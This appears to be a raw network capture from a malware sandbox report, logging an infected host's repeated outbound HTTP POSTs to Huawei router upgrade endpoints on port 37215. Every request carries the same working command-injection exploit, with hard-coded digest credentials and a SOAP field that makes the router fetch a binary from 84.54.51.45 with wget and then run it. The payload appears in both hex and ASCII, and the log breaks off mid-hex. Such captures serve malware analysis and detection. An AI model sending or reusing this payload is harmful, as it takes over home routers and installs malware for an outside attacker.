                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            563192.168.2.155771441.67.225.14337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159224987 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            564192.168.2.155232041.229.233.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159231901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            565192.168.2.154175641.110.135.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159231901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            566192.168.2.153461641.179.4.537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159231901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            567192.168.2.153352841.195.78.8437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159240007 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            568192.168.2.155952841.61.140.3537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159281969 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            569192.168.2.155151641.124.4.637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159282923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            570192.168.2.156024841.17.42.8937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159322977 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            571192.168.2.155309441.218.91.15637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159323931 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            572192.168.2.155290841.15.158.10837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.159327984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 